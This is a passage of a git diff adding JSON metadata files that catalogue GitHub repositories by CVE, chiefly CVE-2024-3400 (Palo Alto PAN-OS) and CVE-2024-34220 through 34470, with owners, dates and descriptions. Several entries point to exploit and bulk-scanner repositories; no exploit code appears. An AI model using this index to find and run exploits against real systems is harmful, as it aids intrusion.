+ "subscribers_count": 1
+ },
+ {
+ "id": 789024043,
+ "name": "panrapidcheck",
+ "full_name": "HackingLZ\/panrapidcheck",
+ "owner": {
+ "login": "HackingLZ",
+ "id": 3459847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3459847?v=4",
+ "html_url": "https:\/\/github.com\/HackingLZ"
+ },
+ "html_url": "https:\/\/github.com\/HackingLZ\/panrapidcheck",
+ "description": "Extract useful information from PANOS support file for CVE-2024-3400",
+ "fork": false,
+ "created_at": "2024-04-19T14:56:17Z",
+ "updated_at": "2024-04-20T08:23:35Z",
+ "pushed_at": "2024-04-19T20:06:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789741548,
+ "name": "cve-2024-3400",
+ "full_name": "Kr0ff\/cve-2024-3400",
+ "owner": {
+ "login": "Kr0ff",
+ "id": 35173514,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35173514?v=4",
+ "html_url": "https:\/\/github.com\/Kr0ff"
+ },
+ "html_url": "https:\/\/github.com\/Kr0ff\/cve-2024-3400",
+ "description": "Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation",
+ "fork": false,
+ "created_at": "2024-04-21T12:38:13Z",
+ "updated_at": "2024-04-21T12:41:00Z",
+ "pushed_at": "2024-04-21T12:40:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791330659,
+ "name": "CVE-2024-3400-pot",
+ "full_name": "zam89\/CVE-2024-3400-pot",
+ "owner": {
+ "login": "zam89",
+ "id": 3533227,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3533227?v=4",
+ "html_url": "https:\/\/github.com\/zam89"
+ },
+ "html_url": "https:\/\/github.com\/zam89\/CVE-2024-3400-pot",
+ "description": "Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability",
+ "fork": false,
+ "created_at": "2024-04-24T14:21:26Z",
+ "updated_at": "2024-05-28T19:54:26Z",
+ "pushed_at": "2024-05-26T15:49:45Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-3400",
+ "flask",
+ "honeypot",
+ "python",
+ "python-3",
+ "python3"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791335435,
+ "name": "CVE-2024-3400-Checker",
+ "full_name": "terminalJunki3\/CVE-2024-3400-Checker",
+ "owner": {
+ "login": "terminalJunki3",
+ "id": 43526239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43526239?v=4",
+ "html_url": "https:\/\/github.com\/terminalJunki3"
+ },
+ "html_url": "https:\/\/github.com\/terminalJunki3\/CVE-2024-3400-Checker",
+ "description": "Check to see if your Palo Alto firewall has been compromised by running script againt support bundle. ",
+ "fork": false,
+ "created_at": "2024-04-24T14:30:34Z",
+ "updated_at": "2024-04-25T13:15:04Z",
+ "pushed_at": "2024-04-25T13:15:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791764978,
+ "name": "CVE-2024-3400-Palo-Alto-OS-Command-Injection",
+ "full_name": "0xr2r\/CVE-2024-3400-Palo-Alto-OS-Command-Injection",
+ "owner": {
+ "login": "0xr2r",
+ "id": 72355033,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72355033?v=4",
+ "html_url": "https:\/\/github.com\/0xr2r"
+ },
+ "html_url": "https:\/\/github.com\/0xr2r\/CVE-2024-3400-Palo-Alto-OS-Command-Injection",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-25T10:23:03Z",
+ "updated_at": "2024-06-13T04:13:12Z",
+ "pushed_at": "2024-04-25T11:49:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 792861986,
+ "name": "CVE-2024-3400",
+ "full_name": "marconesler\/CVE-2024-3400",
+ "owner": {
+ "login": "marconesler",
+ "id": 168297747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168297747?v=4",
+ "html_url": "https:\/\/github.com\/marconesler"
+ },
+ "html_url": "https:\/\/github.com\/marconesler\/CVE-2024-3400",
+ "description": "Exploit for GlobalProtect CVE-2024-3400",
+ "fork": false,
+ "created_at": "2024-04-27T18:58:41Z",
+ "updated_at": "2024-05-31T09:03:23Z",
+ "pushed_at": "2024-04-27T19:02:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 799662179,
+ "name": "CVE-2024-3400",
+ "full_name": "andrelia-hacks\/CVE-2024-3400",
+ "owner": {
+ "login": "andrelia-hacks",
+ "id": 110841971,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110841971?v=4",
+ "html_url": "https:\/\/github.com\/andrelia-hacks"
+ },
+ "html_url": "https:\/\/github.com\/andrelia-hacks\/CVE-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-12T19:48:20Z",
+ "updated_at": "2024-05-12T19:48:35Z",
+ "pushed_at": "2024-05-12T19:48:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 801106921,
+ "name": "IPLineFinder",
+ "full_name": "tk-sawada\/IPLineFinder",
+ "owner": {
+ "login": "tk-sawada",
+ "id": 130136436,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130136436?v=4",
+ "html_url": "https:\/\/github.com\/tk-sawada"
+ },
+ "html_url": "https:\/\/github.com\/tk-sawada\/IPLineFinder",
+ "description": "Find rows contain specific IP addresses in large files and then, extract them. This tool make for investigating logs for cve-2024-3400",
+ "fork": false,
+ "created_at": "2024-05-15T15:50:32Z",
+ "updated_at": "2024-05-20T01:41:26Z",
+ "pushed_at": "2024-05-20T01:41:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802848040,
+ "name": "cve-2024-3400",
+ "full_name": "iwallarm\/cve-2024-3400",
+ "owner": {
+ "login": "iwallarm",
+ "id": 146454845,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146454845?v=4",
+ "html_url": "https:\/\/github.com\/iwallarm"
+ },
+ "html_url": "https:\/\/github.com\/iwallarm\/cve-2024-3400",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T12:38:04Z",
+ "updated_at": "2024-05-23T19:11:53Z",
+ "pushed_at": "2024-05-23T19:11:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34220.json b/2024/CVE-2024-34220.json
new file mode 100644
index 0000000000..7a8feda453
--- /dev/null
+++ b/2024/CVE-2024-34220.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 792704109,
+ "name": "CVE-2024-34220",
+ "full_name": "dovankha\/CVE-2024-34220",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34220",
+ "description": "CVE-2024-34220 | SQL injection",
+ "fork": false,
+ "created_at": "2024-04-27T10:32:10Z",
+ "updated_at": "2024-05-16T14:49:52Z",
+ "pushed_at": "2024-05-16T14:49:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34221.json b/2024/CVE-2024-34221.json
new file mode 100644
index 0000000000..230980968b
--- /dev/null
+++ b/2024/CVE-2024-34221.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798218314,
+ "name": "CVE-2024-34221",
+ "full_name": "dovankha\/CVE-2024-34221",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34221",
+ "description": "CVE-2024-34221 | Insecure pemission",
+ "fork": false,
+ "created_at": "2024-05-09T10:32:30Z",
+ "updated_at": "2024-05-11T10:46:45Z",
+ "pushed_at": "2024-05-11T08:19:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34222.json b/2024/CVE-2024-34222.json
new file mode 100644
index 0000000000..8ebc62a9f7
--- /dev/null
+++ b/2024/CVE-2024-34222.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799116642,
+ "name": "CVE-2024-34222",
+ "full_name": "dovankha\/CVE-2024-34222",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34222",
+ "description": "CVE-2024-34222 | SQL injection",
+ "fork": false,
+ "created_at": "2024-05-11T08:20:55Z",
+ "updated_at": "2024-05-11T10:46:24Z",
+ "pushed_at": "2024-05-11T08:34:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34223.json b/2024/CVE-2024-34223.json
new file mode 100644
index 0000000000..8c8193e5e6
--- /dev/null
+++ b/2024/CVE-2024-34223.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799120747,
+ "name": "CVE-2024-34223",
+ "full_name": "dovankha\/CVE-2024-34223",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34223",
+ "description": "CVE-2024-34223 | Insecure permission",
+ "fork": false,
+ "created_at": "2024-05-11T08:36:16Z",
+ "updated_at": "2024-05-11T10:47:53Z",
+ "pushed_at": "2024-05-11T08:57:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34224.json b/2024/CVE-2024-34224.json
new file mode 100644
index 0000000000..2a3d13ff8b
--- /dev/null
+++ b/2024/CVE-2024-34224.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799128235,
+ "name": "CVE-2024-34224",
+ "full_name": "dovankha\/CVE-2024-34224",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34224",
+ "description": "CVE-2024-34224 | Cross Site Scripting",
+ "fork": false,
+ "created_at": "2024-05-11T08:58:31Z",
+ "updated_at": "2024-05-11T10:54:34Z",
+ "pushed_at": "2024-05-11T10:22:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34225.json b/2024/CVE-2024-34225.json
new file mode 100644
index 0000000000..8b51a57b0c
--- /dev/null
+++ b/2024/CVE-2024-34225.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799155465,
+ "name": "CVE-2024-34225",
+ "full_name": "dovankha\/CVE-2024-34225",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34225",
+ "description": "CVE-20240-34225 | Cross Site Scripting",
+ "fork": false,
+ "created_at": "2024-05-11T10:20:52Z",
+ "updated_at": "2024-05-11T10:54:14Z",
+ "pushed_at": "2024-05-11T10:25:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34226.json b/2024/CVE-2024-34226.json
new file mode 100644
index 0000000000..28cba7704c
--- /dev/null
+++ b/2024/CVE-2024-34226.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799159247,
+ "name": "CVE-2024-34226",
+ "full_name": "dovankha\/CVE-2024-34226",
+ "owner": {
+ "login": "dovankha",
+ "id": 63991630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4",
+ "html_url": "https:\/\/github.com\/dovankha"
+ },
+ "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-34226",
+ "description": "CVE-2024-34226 | SQL injection",
+ "fork": false,
+ "created_at": "2024-05-11T10:33:04Z",
+ "updated_at": "2024-05-11T10:53:59Z",
+ "pushed_at": "2024-05-11T10:42:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34310.json b/2024/CVE-2024-34310.json
new file mode 100644
index 0000000000..8bf6e7f293
--- /dev/null
+++ b/2024/CVE-2024-34310.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798792445,
+ "name": "CVE-2024-34310",
+ "full_name": "3309899621\/CVE-2024-34310",
+ "owner": {
+ "login": "3309899621",
+ "id": 121653948,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121653948?v=4",
+ "html_url": "https:\/\/github.com\/3309899621"
+ },
+ "html_url": "https:\/\/github.com\/3309899621\/CVE-2024-34310",
+ "description": "CVE-2024-34310",
+ "fork": false,
+ "created_at": "2024-05-10T13:36:19Z",
+ "updated_at": "2024-05-10T13:39:31Z",
+ "pushed_at": "2024-05-10T13:39:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34312.json b/2024/CVE-2024-34312.json
new file mode 100644
index 0000000000..8971d2fa0f
--- /dev/null
+++ b/2024/CVE-2024-34312.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 818913831,
+ "name": "CVE-2024-34312",
+ "full_name": "vincentscode\/CVE-2024-34312",
+ "owner": {
+ "login": "vincentscode",
+ "id": 26576880,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26576880?v=4",
+ "html_url": "https:\/\/github.com\/vincentscode"
+ },
+ "html_url": "https:\/\/github.com\/vincentscode\/CVE-2024-34312",
+ "description": "☣️ This repository contains the description and a proof of concept for CVE-2024-34312",
+ "fork": false,
+ "created_at": "2024-06-23T08:37:44Z",
+ "updated_at": "2024-06-23T09:28:30Z",
+ "pushed_at": "2024-06-23T08:59:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "security-research"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34313.json b/2024/CVE-2024-34313.json
new file mode 100644
index 0000000000..68b2f72b47
--- /dev/null
+++ b/2024/CVE-2024-34313.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 818920157,
+ "name": "CVE-2024-34313",
+ "full_name": "vincentscode\/CVE-2024-34313",
+ "owner": {
+ "login": "vincentscode",
+ "id": 26576880,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26576880?v=4",
+ "html_url": "https:\/\/github.com\/vincentscode"
+ },
+ "html_url": "https:\/\/github.com\/vincentscode\/CVE-2024-34313",
+ "description": "☣️ This repository contains the description and a proof of concept for CVE-2024-34313",
+ "fork": false,
+ "created_at": "2024-06-23T09:02:07Z",
+ "updated_at": "2024-06-25T06:53:40Z",
+ "pushed_at": "2024-06-23T09:20:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "security-research"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3435.json b/2024/CVE-2024-3435.json
new file mode 100644
index 0000000000..006e908876
--- /dev/null
+++ b/2024/CVE-2024-3435.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 803069213,
+ "name": "cve-2024-3435",
+ "full_name": "ymuraki-csc\/cve-2024-3435",
+ "owner": {
+ "login": "ymuraki-csc",
+ "id": 119641175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119641175?v=4",
+ "html_url": "https:\/\/github.com\/ymuraki-csc"
+ },
+ "html_url": "https:\/\/github.com\/ymuraki-csc\/cve-2024-3435",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T02:17:44Z",
+ "updated_at": "2024-05-20T02:17:54Z",
+ "pushed_at": "2024-05-20T02:17:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34351.json b/2024/CVE-2024-34351.json
new file mode 100644
index 0000000000..b066eed667
--- /dev/null
+++ b/2024/CVE-2024-34351.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 799502114,
+ "name": "CVE-2024-34351",
+ "full_name": "Voorivex\/CVE-2024-34351",
+ "owner": {
+ "login": "Voorivex",
+ "id": 16985510,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16985510?v=4",
+ "html_url": "https:\/\/github.com\/Voorivex"
+ },
+ "html_url": "https:\/\/github.com\/Voorivex\/CVE-2024-34351",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-12T10:49:41Z",
+ "updated_at": "2024-05-24T10:44:05Z",
+ "pushed_at": "2024-05-12T13:05:22Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34452.json b/2024/CVE-2024-34452.json
new file mode 100644
index 0000000000..91c4c72c74
--- /dev/null
+++ b/2024/CVE-2024-34452.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817432934,
+ "name": "CVE-2024-34452",
+ "full_name": "surajhacx\/CVE-2024-34452",
+ "owner": {
+ "login": "surajhacx",
+ "id": 158517938,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158517938?v=4",
+ "html_url": "https:\/\/github.com\/surajhacx"
+ },
+ "html_url": "https:\/\/github.com\/surajhacx\/CVE-2024-34452",
+ "description": "Cross-Site Scripting (XSS) Vulnerability in CMSimple_XH",
+ "fork": false,
+ "created_at": "2024-06-19T17:38:49Z",
+ "updated_at": "2024-06-19T18:17:28Z",
+ "pushed_at": "2024-06-19T18:17:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34469.json b/2024/CVE-2024-34469.json
new file mode 100644
index 0000000000..84d0674dde
--- /dev/null
+++ b/2024/CVE-2024-34469.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 797102726,
+ "name": "CVE-2024-34469",
+ "full_name": "Toxich4\/CVE-2024-34469",
+ "owner": {
+ "login": "Toxich4",
+ "id": 47368696,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47368696?v=4",
+ "html_url": "https:\/\/github.com\/Toxich4"
+ },
+ "html_url": "https:\/\/github.com\/Toxich4\/CVE-2024-34469",
+ "description": "CVE-2024-34469",
+ "fork": false,
+ "created_at": "2024-05-07T07:47:20Z",
+ "updated_at": "2024-05-07T14:10:01Z",
+ "pushed_at": "2024-05-07T09:24:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-34470.json b/2024/CVE-2024-34470.json
new file mode 100644
index 0000000000..c5ffdd77ce
--- /dev/null
+++ b/2024/CVE-2024-34470.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 796108085,
+ "name": "CVE-2024-34470",
+ "full_name": "osvaldotenorio\/CVE-2024-34470",
+ "owner": {
+ "login": "osvaldotenorio",
+ "id": 45275816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4",
+ "html_url": "https:\/\/github.com\/osvaldotenorio"
+ },
+ "html_url": "https:\/\/github.com\/osvaldotenorio\/CVE-2024-34470",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T00:31:31Z",
+ "updated_at": "2024-05-05T00:52:15Z",
+ "pushed_at": "2024-05-05T00:52:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817279681,
+ "name": "CVE-2024-34470",
+ "full_name": "bigb0x\/CVE-2024-34470",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-34470",
+ "description": "POC and bulk scanner for CVE-2024-34470",
+ "fork": false,
+ "created_at": "2024-06-19T11:32:40Z",
+ "updated_at": "2024-06-25T11:29:18Z",
+ "pushed_at": "2024-06-19T21:22:15Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817593815,
+ "name": "CVE-2024-34470",
+ "full_name": "Cappricio-Securities\/CVE-2024-34470",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-34470",
+ "description": "HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion",
+ "fork": false,
+ "created_at": "2024-06-20T04:01:42Z",
+ "updated_at": "2024-06-21T09:48:47Z",
+ "pushed_at": "2024-06-21T09:48:44Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 817890438,
+ "name": "CVE-2024-34470",
+ "full_name": "Mr-r00t11\/CVE-2024-34470",
+ "owner": {
+ "login": "Mr-r00t11",
+ "id": 68824333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4",
+ "html_url": "https:\/\/github.com\/Mr-r00t11"
+ },
+ "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-34470",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-20T16:47:28Z",
+ "updated_at": "2024-06-21T13:58:16Z",
+ "pushed_at": "2024-06-20T18:30:07Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818833785,
+ "name": "CVE-2024-34470",
+ "full_name": "th3gokul\/CVE-2024-34470",
+ "owner": {
+ "login": "th3gokul",
+ "id": 89386101,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4",
+ "html_url": "https:\/\/github.com\/th3gokul"
+ },
+ "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-34470",
+ "description": "CVE-2024-34470 : An Unauthenticated Path Traversal Vulnerability in HSC Mailinspector",
+ "fork": false,
+ "created_at": "2024-06-23T02:23:57Z",
+ "updated_at": "2024-06-23T17:12:53Z",
+ "pushed_at": "2024-06-23T02:41:55Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
